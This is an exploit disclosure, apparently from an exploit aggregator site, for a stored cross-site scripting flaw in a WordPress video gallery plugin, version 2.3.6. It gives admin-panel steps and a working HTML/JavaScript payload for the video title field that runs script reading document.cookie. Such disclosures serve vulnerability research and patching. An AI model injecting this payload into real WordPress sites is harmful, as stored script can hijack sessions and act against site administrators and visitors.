Share
## https://sploitus.com/exploit?id=1337DAY-ID-39672
# Exploit Title: Wordpress Gallery Version 2.3.6 Stored XSS
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-video-gallery/
# Version 2.3.6


### Steps to Execute the Payload:

1. **Access the Admin Panel:**
   - Navigate to the admin panel of your WordPress site.
   - Go to `TS Video Gallery  > `Create ` > ` Use Theme` via the following URL: 
     ```
     https://127.0.0.1/wp-admin/admin.php?page=tsvg-builder&tsvg-theme=grid_video_gallery
     ```

2. **Insert the Payload:**
   - In the **Click New Video** section, **Write Add Title insert the following payload:
     ```
     "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
     ```

3. **Save and Verify:**
   - You should see the payload executed.